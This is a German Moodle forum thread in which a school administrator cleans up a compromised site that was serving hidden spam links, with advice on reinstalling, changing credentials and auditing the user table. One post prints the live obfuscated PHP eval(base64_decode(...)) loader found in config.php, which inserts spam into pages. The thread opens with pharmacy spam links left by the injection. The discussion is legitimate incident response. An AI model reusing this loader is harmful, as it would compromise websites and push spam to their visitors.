<a href="http://forums.about.com/n/pfx/forum.aspx?tsn=1&nav=messages&webtag=ab-skateboard&tid=7575">Buy Chantix no perscription cod</a>
<a href="http://forums.about.com/n/pfx/forum.aspx?tsn=1&nav=messages&webtag=ab-skateboard&tid=7576">Buy Effexor no perscription cod</a>
<a href="http://forums.about.com/n/pfx/forum.aspx?tsn=1&nav=messages&am
Mittelwert:  -
Als Antwort auf Steffen Auer

Re: versteckte Werbelinks - ggf. schlimmeres - auf Startseite eingeschleust

von Maik Riecken -
Hallo,

Wenn ich als Angreifer Code einschleusen kann, so habe ich oft Zugriff auf das Dateisystem. Habe ich Zugriff auf das Dateisystem, so kann ich z.B. die config.php im Klartext inkl. der dort hinterlegten Zugangsdaten für MySQL auslesen. Damit habe ich Zugriff auf fast jedes Benutzerpasswort, da die MD5-Hashes mit Rainbowtabellen in der Regel sehr leicht zu entschlüsseln sind.

Hinweise darauf kann eine veränderte config.php sein.

Ein einfaches Upgrade reicht in diesen Fällen nicht. Das System muss komplett neu aufgesetzt werden, da du nicht weißt, was inzwischen mit deiner Datenbank geschehen ist, d.h. alle Dateien des Accounts löschen, neue Datenbank einsetzen.

In solchen Fällen rechnet sich ein aufwändiges Backupkonzept, da man nicht sämtliche Daten verliert. Upgrades sollten am besten wöchentlich erfolgen. Das gilt für jede PHP-basierte Anwendung, nicht nur für Moodle.

Gruß,

Maik

PS:
FTP ist ein Klartextprotokoll. Die Zugangsdaten sind also jedem bekannt, der es schafft, diese Daten entweder im RZ des Betreibers oder bei euch im Schulnetz abzufangen. Dafür reicht ein Netzwerkscanner und eine Netzwerkdose. Eine IP braucht es dafür nicht. Für wirklich wichtige Daten ist FTP nicht mehr zeitgemäß, sondern lediglich bequem und verbreitet,

PPS:
Softwarefirewalls (z.B. Norton & Co.) sind in Sicherheitskreisen arg umstritten. U.U. erzeugen sie mehr Lücken als sie schließen. Viele Anwender verzichten nämlich auf Aktualisierungen, weil sie ja über eine aktuelle Firewall verfügen....
Als Antwort auf Maik Riecken

Re: versteckte Werbelinks - ggf. schlimmeres - auf Startseite eingeschleust

von Steffen Auer -
Hallo,

>Hinweise darauf kann eine veränderte config.php sein.

ok, das trifft ohne Überraschung zu (1. Zeile):

<? /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ3NoX25vJ10pKXskR0xPQkFMU1snc2hfbm8nXT0xO2lmKGZpbGVfZXhpc3RzKCcvc3J2L3d3dy92aXJ0dWFsLzIwMjQ5L3d3dy5hbm5lLWZyYW5rLXJzZW5nZW4uZGUvdmhvc3RkYXRhL2h0ZG9jL3RoZW1lL2NoYW1lbGVvbi9waXgvbW9kL2RhdGEvZmllbGQvdGV4dC9tZGxfdXRmLnBocCcpKXtpbmNsdWRlX29uY2UoJy9zcnYvd3d3L3ZpcnR1YWwvMjAyNDkvd3d3LmFubmUtZnJhbmstcnNlbmdlbi5kZS92aG9zdGRhdGEvaHRkb2MvdGhlbWUvY2hhbWVsZW9uL3BpeC9tb2QvZGF0YS9maWVsZC90ZXh0L21kbF91dGYucGhwJyk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmIWZ1bmN0aW9uX2V4aXN0cygnZGdvYmgnKSl7aWYoIWZ1bmN0aW9uX2V4aXN0cygnZ3pkZWNvZGUnKSl7ZnVuY3Rpb24gZ3pkZWNvZGUoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCl7JFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2Qj1vcmQoc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMywxKSk7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT0xMDskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPTA7aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiY0KXskUjBENTQyMzZEQTIwNTk0RUMxM0ZDODFCMjA5NzMzOTMxPXVucGFjaygndicsc3Vic3RyKCRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4NjgsMTAsMikpOyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE9JFIwRDU0MjM2REEyMDU5NEVDMTNGQzgxQjIwOTczMzkzMVsxXTskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yKyRSMEQ1NDIzNkRBMjA1OTRFQzEzRkM4MUIyMDk3MzM5MzE7fWlmKCRSNkI2RTk4Q0RFOEIzMzA4N0EzM0U0RDNBNDk3QkQ4NkImOCl7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYxNil7JFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MT1zdHJwb3MoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCxjaHIoMCksJFI2MDE2OUNEMUM0N0I3QTdBODVBQjQ0Rjg4NDYzNUU0MSkrMTt9aWYoJFI2QjZFOThDREU4QjMzMDg3QTMzRTREM0E0OTdCRDg2QiYyKXskUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKz0yO30kUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPWd6aW5mbGF0ZShzdWJzdHIoJFIyMEZENjVFOUM3NDA2MDM0RkFEQzY4MkYwNjczMjg2OCwkUjYwMTY5Q0QxQzQ3QjdBN0E4NUFCNDRGODg0NjM1RTQxKSk7aWYoJFJDNEE1QjVFMzEwRUQ0QzMyM0UwNEQ3MkFGQUUzOUY1Mz09PUZBTFNFKXskUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzPSRSMjBGRDY1RTlDNzQwNjAzNEZBREM2ODJGMDY3MzI4Njg7fXJldHVybiAkUkM0QTVCNUUzMTBFRDRDMzIzRTA0RDcyQUZBRTM5RjUzO319ZnVuY3Rpb24gZGdvYmgoJFJEQTNFNjE0MTRFNTBBRUU5NjgxMzJGMDNEMjY1RTBDRil7SGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7JFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MD1nemRlY29kZSgkUkRBM0U2MTQxNEU1MEFFRTk2ODEzMkYwM0QyNjVFMENGKTtpZihwcmVnX21hdGNoKCcvXDxib2R5L3NpJywkUjNFMzNFMDE3Q0Q3NkI5QjdFNkM3MzY0RkI5MUUyRTkwKSl7cmV0dXJuIHByZWdfcmVwbGFjZSgnLyhcPGJvZHlbXlw+XSpcPikvc2knLCckMScuZ21sKCksJFIzRTMzRTAxN0NENzZCOUI3RTZDNzM2NEZCOTFFMkU5MCk7fWVsc2V7cmV0dXJuIGdtbCgpLiRSM0UzM0UwMTdDRDc2QjlCN0U2QzczNjRGQjkxRTJFOTA7fX1vYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
<?php /// Moodle Configuration File


>Ein einfaches Upgrade reicht in diesen Fällen nicht. Das System muss komplett neu >aufgesetzt werden, da du nicht weißt, was inzwischen mit deiner Datenbank >geschehen ist, d.h. alle Dateien des Accounts löschen, neue Datenbank einsetzen.

da muss ich Belwü kontaktieren, da nur die die Datenbank neu anlegen und mit neuem Passwort versehen können traurig

>Upgrades sollten am besten wöchentlich erfolgen.
du meinst Backups, oder?

>FTP ist ein Klartextprotokoll. Die Zugangsdaten sind also jedem bekannt, der es >schafft, diese Daten entweder im RZ des Betreibers oder bei euch im Schulnetz >abzufangen. Dafür reicht ein Netzwerkscanner und eine Netzwerkdose. Eine IP >braucht es dafür nicht. Für wirklich wichtige Daten ist FTP nicht mehr zeitgemäß, >sondern lediglich bequem und verbreitet,

ich meinte eigentlich auch scp.

>Softwarefirewalls (z.B. Norton & Co.) sind in Sicherheitskreisen arg umstritten. U.U. >erzeugen sie mehr Lücken als sie schließen. Viele Anwender verzichten nämlich auf >Aktualisierungen, weil sie ja über eine aktuelle Firewall verfügen....

also mein PC ist trotzdem vollständig gepatcht - und hinter einem Router mit Firewall.

MfG
Steffen
Als Antwort auf Steffen Auer

Re: versteckte Werbelinks - ggf. schlimmeres - auf Startseite eingeschleust

von Sylvio Runge -
>eine Unmenge Code eingeschleust...
Das System ist kompromitiert; offensichtlich von einem Spam-Bot verursacht (siehe dazu auch unzähliche andere Meldungen hier im Forum)

>Anmeldung ist nur per Authorisierung über den LDAP unseres Schulservers möglich.
Für das Einschleusen des Codes braucht man oft gar keine Autorisierung.
Es sind sql-injections bzw. Cross Site Scripting-injections.
Da "hacken" aber nach der Bundesregierung (->hackerparagraph) seit Mitte 2008 verboten ist, kann das gar nicht sein zwinkernd Schon der Besitz von Tools ist strafbar (man darf also im Prinzip seine eigene site nicht mal prüfen).

>1. Was kann ich tun, um den Code zu entfernen (Wo muss ich suchen)?
ein sauberes aktuelles System neu aufsetzen und verscuhen alte Daten (sofern nötig) zu importieren). Was genau da bei Dir verändert wurde muß Du selber untersuchen; notfalls über einen moodle-partner beauftragen...

>2. Auf welchem Weg könnte die Einschleusung erfolgen - und wie kann ich das dauerhaft verhindern?
*gegelmäßig* Sicherheitsupdates einspielen oder das System nicht ans Netz hängen ;)

>Ach ja - der PC, von dem ich administriere, ist nur mir zugänglich und immer mit >aktueller Internetsecurity geschützt.
Das ist eine typische Windows-User-Aussage. Eine "Anwenungsfirewall", die man auf "allow" gesetzt hat hilft da überhaupt nichts. Ebenso wenn diese gar noch IE-bestandteile nutzt, die eh oft auf "allow" stehen. Der CCC hat es ja mal vor Jahren z.b. mit dem Norton-Produkt als besonderes Negativbeispiel demonstiert, daß durch diese Anwendung es sogar noch leichter war die Windows-Büchse zu infiltrieren, ohne das es der Nutzer merkt (Film dazu ist beim CCC zu finden)...


S.


Als Antwort auf Sylvio Runge

Re: versteckte Werbelinks - ggf. schlimmeres - auf Startseite eingeschleust

von Steffen Auer -
Hallo,

dass das System kompromittiert ist, war mir schon klar, aber wenn ich euch recht verstehe, muss ich um das zu beheben

1. die Datenbank löschen, neu anlegen (natürlich mit anderem Passwort)
2. Moodle neu aufsetzen.
3. Daten importieren

und bei 3. fängt es an zu haken, denn
ich habe zwar Backups der Datenbank, da ich aber nicht jeden Tag den Quellcode anschaue (zumindest bislang nicht) - weiß ich nicht, wie lange das Problem schon besteht, d.h. welcher Dump noch sauber ist.

Andere Möglichkeit wäre, Kurssicherungen zurückzuspielen, da aber das Moodle-eigene Sicherungssystem schon länger nicht mehr funktioniert, sind die Kurssicherungen alle recht alt. Klar kann ich von jedem Kurs nun eine Sicherung händisch machen, aber es bleibt für mich noch die Frage: Ist die Kurssicherung denn überhaupt "sauber".

Zumindest bei der Startseite wäre ich da skeptisch, da dies ja die Seite mit dem Code ist.

Zum Verständnis:
Wenn ich nun alles platt mache,
Datenbank und FTP-Passwörter ändere
Moodle neu aufspiele
dürfte das System ja zunächst absolut unkompromittiert und sicher sein.

Wenn ich dann aber einen alten Datenbankdump zurückspiele, der aus der Zeit der Kompromittierung stammt, dann kann es sein, dass ich dem Spambot wieder den Zugang ermögliche, weil er vielleicht irgendwo Code abgelegt hat, der die neuen Daten der Config.php preisgibt?

Lässt sich die Datenbank nicht daraufhin durchsuchen?

Könnt ihr mir also bitte nochmal sagen, welcher Weg und welches Vorgehen sicherer ist, damit ich mir nicht gleich wieder mit dem Rückspielen was einhandle? Nach Möglichkeit sollten keine Daten verloren gehen.

Gruß
Steffen
Als Antwort auf Steffen Auer

Re: versteckte Werbelinks - ggf. schlimmeres - auf Startseite eingeschleust

von Maik Riecken -
  • Wenn ich nun alles platt mache,
  • Datenbank und FTP-Passwörter ändere
  • Moodle neu aufspiele
  • dürfte das System ja zunächst absolut unkompromittiert und sicher sein.
Unter der Voraussetzung, dass der Angreifer nicht durch eine Sicherheitslücke deines Providers oder eines weiteren, von dir eingesetzten Scriptes auf dem gleichen Account hereingekommen ist, stimmt das so. Letzteres halte ich jedoch für unwahrscheinlich. Zur Zeit werden massiv FTP-Server Ziel von Attacken.

"Wenn ich dann aber einen alten Datenbankdump zurückspiele, der aus der Zeit der Kompromittierung stammt, dann kann es sein, dass ich dem Spambot wieder den Zugang ermögliche, weil er vielleicht irgendwo Code abgelegt hat, der die neuen Daten der Config.php preisgibt?"

Jein. Das halte ich eher für eine theoretische Möglichkeit. Wahrscheinlicher finde ich, dass in dem Dump ein Account mit Adminrechten verborgen ist - so würde ich es als Angreifer machen - also einmal die Tabelle mdl_users daraufhin durchforsten.

Du siehst, dass es "den Weg" nicht gibt. Es wäre auf jeden Fall empfehlenswert, jemanden draufschauen zu lassen, der sich wirklich damit auskennt (um für die Zukunft ein möglichst automatisiertes Backupkonzept zu erstellen...).

Bei so etwas gehen immer Daten verloren, gerade in deiner speziellen Situation. Durch z.B. das Upgrade hast du u.U. genau die Daten zerstört, die ein Experte benötigt hätte, um den Angriff zu analysieren. Erst danach kann man eigentlich sagen, wie man sich konkret verhalten kann - deswegen kommt jetzt hier auch der Rat, dass du deinem System generell nicht mehr trauen solltest. Das Kind ist schon im Brunnen.

Gruß,

Maik
Als Antwort auf Maik Riecken

Re: versteckte Werbelinks - ggf. schlimmeres - auf Startseite eingeschleust

von Steffen Auer -
>Unter der Voraussetzung, dass der Angreifer nicht durch eine Sicherheitslücke
>deines Providers oder eines weiteren, von dir eingesetzten Scriptes auf dem >gleichen Account hereingekommen ist, stimmt das so. Letzteres halte ich jedoch >für unwahrscheinlich. Zur Zeit werden massiv FTP-Server Ziel von Attacken.

hm, ich hatte fälschlicherweise ftp geschrieben, es ist aber scp.

Der Provider ist Belwü - die machen eigentlich immer einen riesen Terz um Sicherheit - daher glaube ich eher nicht, dass deren Server eine Lücke hat.

>Jein. Das halte ich eher für eine theoretische Möglichkeit. Wahrscheinlicher finde >ich, dass in dem Dump ein Account mit Adminrechten verborgen ist - so würde ich >es als Angreifer machen - also einmal die Tabelle mdl_users daraufhin durchforsten.
ok, unter den Benutzern in Moodle selbst taucht kein Benutzer auf, der administrative Rechte hat (abgesehen von meinem Adminaccount)

Die Datenbank muss ich noch durchforsten.

Das bedeutet, dass ich, wenn scp und Datenbank/Passwörter gelöscht sind bzw. neu vergeben und ich neu aufsetze und dann einen daraufhin überprüften Dump zurückspiele, dass es wahrscheinlich ist, dass ich dann wieder Ruhe habe - wahrscheinlich, aber nicht 100%ig sicher, wobei wohl kein System 100% sicher sein kann lächelnd

>deswegen kommt jetzt hier auch der Rat, dass du deinem System generell nicht >mehr trauen solltest. Das Kind ist schon im Brunnen.

ok, ich werde dann wohl mal mal
1. Datenbank löschen
2. neu anlegen mit anderen Passwörtern
3. scp Nutzer löschen und mit neuem Passwort anlegen
4. Moodle neu aufsetzen
5. überprüften Dump zurückspielen
6. hoffen

MfG
Steffen
Als Antwort auf Steffen Auer

Re: versteckte Werbelinks - ggf. schlimmeres - auf Startseite eingeschleust

von Sylvio Runge -
also so wie der decodierte base64-kram oben aussieht (nur kurz drauf geschaut; d.h. vermutlich !), betritt der hack nur php-datein; nicht die datenbank.
ich wuerde so vorgehen (ohne garantie ob's hier auch so geht ):
- per .htaccess nur meien IP erlauben -> wg.wartung...
- prüfen wie der hack ausgeführt wurde (access-file usw.);nicht dass er ohne das scross-scripting reingekommen ist (dann bringt ein update nichts)
- backup der DB UND der Files; backup checken
- passwörter fuer db und shell/scp umsetzen
- alle moodlefiles (klar ausser moodle-data) loeschen
- die selbe (alte!) moddleversion einspielen, config per hand anpassen (kein update)
- prüfen ob alles läuft
- moodle-version updaten
- prüfen
- htaccess wieder erlauben

es "könnte" dann aber noch was in moodle-date bzw. der db versteckt sein; musst Du selbst abschaetzen/überprüfen...

s.


Als Antwort auf Sylvio Runge

Re: versteckte Werbelinks - ggf. schlimmeres - auf Startseite eingeschleust

von Steffen Auer -
Hallo,

>also so wie der decodierte base64-kram oben aussieht (nur kurz drauf geschaut; >
> d.h. vermutlich !), betritt der hack nur php-datein; nicht die datenbank.

das hoffe ich sehr.

>- prüfen wie der hack ausgeführt wurde (access-file usw.);nicht dass er ohne das
>scross-scripting reingekommen ist (dann bringt ein update nichts)

wie genau prüfe ich das?

>- moodle-version updaten
das Problem ist, dass ich kein Update machen kann, weil ich schon die 1.9.5+ einsetze.
Ich versuche daher dann mal folgendes:
- Passwörter ändnern, Datenbank löschen
- Alle Dateien löschen und neu aufspielen.
- Dump der Datenbank einspielen.

>es "könnte" dann aber noch was in moodle-date bzw. der db versteckt sein; musst
>Du selbst abschaetzen/überprüfen...
Nach dem Tipp von Maik habe ich gerade die Tabelle user überprüft. es gibt nur einen Admin - wie es sein soll. Auffällige E-Mail-basierte Anmeldungen (das war früher mal erlaubt) habe ich aus der Datenbank entfernt

Off Topic:
Da stehen (bzw. standen) noch unzählige Benutzer drin, die ich als admin auf der Weboberfläche von Moodle entfernt hatte (ehemalige Schüler)
Dies bewirkt wohl nur, dass sie dort nicht mehr auftauchen, in der Datenbank bleiben sie aber drin traurig

MfG
Steffen

s.
Als Antwort auf Steffen Auer

Re: versteckte Werbelinks - ggf. schlimmeres - auf Startseite eingeschleust

von Ralf Hilgenstock -
Nutzerbild von Besonders aktive Moodler Nutzerbild von Deutsche Moodle Übersetzer Nutzerbild von Entwickler Nutzerbild von Moodle Partner Nutzerbild von Translators
Es gibt nach meiner Kenntnis drei verschiedene Formen von Angriffen auf Softwaresysteme, die im Moodle Bereich insbesondere relevant sein können.

  • Manipulation/Angriff auf den Programmcode
    Hierwird versucht direkt Programmdateien zu verändern. Ursache meist unsichere Serverkonfigurationen oder 'abgehorchte' FTP Zugänge o.ä.

  • Cross Site Scripting
    In Nutzer gibt z.B. im Editor Programmcode ein und speichert diesen damit in der Datenbank ab. Dieser wird später ausgeführt.
    Hier hat Moodle in der letzten Zeit sehr schnell und früh reagiert und potenzielle Lücken beseitigt. Im Regelfall wird der Code geprüft und kommentarlos gelöscht. Wenn man nicht unsichere Rechteinstellungen vornimmt oder alte Versionen betreit dürfte das Risiko hier gering sein.

  • Nutzeraccounts für Spam missbrauchen
    Hierbei wird durch automatische Programme versucht viele Accounts emailbasiert anzulegen. Danach wird die Mailadresse geändert und im Profil Werbung hinterlegt. Dies ist nur interessant, wenn Nutzerprofile ohne Login für Suchmaschinen durchsuchbar sind. Dies ist bei den Standardeinstellungen nicht möglich. Es gibt mehrere Mechanismen, die es für Spammer uninteressant machen, dies auszuführen.
    Meine Beobachtung bei verschiedenen Systemen ist, dass es sofort aufhört, wenn bestimmte Barriere eingebaut werden.
Ralf Hilgenstock
Modle Partner

Als Antwort auf Ralf Hilgenstock

Re: versteckte Werbelinks - ggf. schlimmeres - auf Startseite eingeschleust

von Steffen Auer -
  • "Hierwird versucht direkt Programmdateien zu verändern. Ursache meist unsichere Serverkonfigurationen oder 'abgehorchte' FTP Zugänge o.ä."

das hoffe ich nicht, zumindest das mit dem abgehorchten Zugang würde darauf schließen, dass ich den Zugang mal an einem infizierten PC genutzt habe. Jegliche Checks an meinem PC, die ich kenne, waren aber negativ.

  • "Cross Site Scripting
    In Nutzer gibt z.B. im Editor Programmcode ein und speichert diesen damit in der Datenbank ab. Dieser wird später ausgeführt.
    Hier hat Moodle in der letzten Zeit sehr schnell und früh reagiert und potenzielle Lücken beseitigt. Im Regelfall wird der Code geprüft und kommentarlos gelöscht. Wenn man nicht unsichere Rechteinstellungen vornimmt oder alte Versionen betreit dürfte das Risiko hier gering sein."
da ich eigentlich i.d.R immer versuche, die Last Version einzusetzen, ebenfalls unwahrscheinlich, aber natürlich nicht ausgeschlossen.


  • "Nutzeraccounts für Spam missbrauchen"
scheidet bei meinen Symptomen wohl eher aus, so weit ich diese beliebte Variante mitverfolgt habe.

Wenn das Kopieren der Originaldateien nichts bringt und ich in der Datenbank nichts finde, dann muss ich wohl bis zum nächsten Update warten. Ein solches hat schon einmal geholfen, doch wie gesagt, ich setze schon 1.9.5+ ein traurig
Als Antwort auf Steffen Auer

Re: versteckte Werbelinks - ggf. schlimmeres - auf Startseite eingeschleust

von Steffen Auer -
so, ich habe nun, da es mich keine Zeit kostet, nebenher den scp-Transfer mitlaufen zu lassen, mal alle Moodle-Dateien gegen die originalen ausgetauscht - und siehe da, im Quellcode gibt es keine Hinweise mehr für eine Kompromittierung.

Leider kann ich bei Belwü die Passwörter für scp und Datenbank nicht selbst ändern, weshalb das Belwü morgen für mich machen muss. Bleibt zu hoffen, dass das dann dauerhafte Abhilfe schafft - und dass der Code bis dahin nicht neu eingeschleust wird, wie es nach dem Update der Fall war.

MfG
Steffen
Als Antwort auf Steffen Auer

Re: versteckte Werbelinks - ggf. schlimmeres - auf Startseite eingeschleust

von Steffen Auer -
Hallo,

also die Passwörter sind geändert, die Dateien neu aufgespielt und im Quellcode keine invisiblen Links (=Spam) mehr.

Auch die Base64 Zeile in der config.php sowie allen anderen php´s (da war die Zeile nämlich auch überall drin) ist weg.

Nun heißt es regelmäßig in die config.php schauen und den Quellcode anschauen - und hoffen lächelnd.

MfG
Steffen